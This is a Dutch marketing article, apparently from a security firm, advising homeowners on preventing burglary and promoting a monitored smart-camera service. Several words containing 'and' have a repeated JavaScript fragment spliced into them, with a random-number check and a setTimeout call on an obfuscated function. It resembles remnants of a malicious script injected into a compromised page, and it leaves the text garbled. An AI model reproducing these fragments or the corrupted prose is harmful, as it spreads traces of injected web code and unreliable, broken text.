Bescherm uzelf tegen woninginbraak

Het zal u maar gebeuren: een woninginbraak. Onbekenden die zich met geweld toegang verschaffen tot uw woning. Tot “uw eigen plekje” waar uw gezin zich veilig hoort te voelen. Waar u hard voor werkt of voor heeft gewerkt. Wreed verstoorde veiligheid die in alle gevallen gepaard gaat met veel ellende: opengebroken ramen, deuren, glasschade en een hoop “gedoe” met de verzekering.
Een woning die compleet overhoop wordt gehaald: kasten, laden, kluizen, niets wordt ontzien en ondersteboven gegooid. Geld en goederen die worden meegenomen. De geërfde sieraden van grootmoeder, alles is weg.

De impact

Wij maken het dagelijks mee bij onze opdrachtgevers. Hoewel elke inbraak andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders is hebben ze één ding gemeen: De impact op het veiligheidsgevoel is gigantisch. De kinderen durven niet alleen thuis te blijven, mensen voelen zich gevangen in hun eigen woning.

Wat kunt u doen tegen woninginbraak

Er wordt ons regelmatig gevraagd wat men kan doen om een woninginbraak te voorkomen: voorkomen is immers beter dan genezen.
In basis geldt de regel dat je het vooral moet laten lijken alsof er iemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and thuis is en alert moet zijn op zaken die afwijken van het “normale”. Vreemde personen in de wijk, onbekende auto’s op allerlei tijdstippen, houd ze in de gaten. Noteer eventueel een kenteken en speel dit door aan de politie.
Bent u zelf een tijdje niet thuis, zorg er dan voor dat de post dagelijks wordt weggehaald en dat de verlichting brandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andt ’s avonds. Regel dit met vrienden, familie of goede buren en help elkaar deze ellende voorkomen.

Elektronische beveiliging

Andere opties kunnen ook worden gevonden in elektronische maatregelen als een alarmsysteem of een cameraoplossing.
Correct kan u met de nieuwste technieken helpen inbrekers buiten de deur te houden. Eén van de nieuwe methodes is een “slimme” cameraoplossing. “Slim” omdat het geavanceerde camerasysteem zelfstandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andig uw tuin of oprit bewaakt.
Bij de installatie van de camera wordt een denkbeeldige lijn getrokken rondom uw woning. Het gebied binnen deze lijnen wordt bewaakt met behulp van de camera. Als er door de camera beweging wordt geconstateerd geeft het systeem automatisch een melding naar de beveiligingsdienst. Onze meldkamer krijgt het beeld binnen en kan direct zien wat er aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is rondom uw woning. Let op: er is dan nog niemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and in uw woning.
Afhankelijk van wat hij ziet beslist de beveiliger welke actie hij neemt: de politie waarschuwen en een collega naar het adres sturen of de melding wegwerken omdat op de beelden de kat van de buren te zien is.
Indien het gaat om een inbraakpoging kan door een vroegtijdige signalering en een juiste inschatting een inbraak worden voorkomen. Bovendien wordt, doordat de politie vroegtijdig wordt gealarmeerd, de kans dat potentiële inbrekers worden aangehouden vele malen groter.
Uw “eigen plek” blijft dan ook uw “eigen plek”.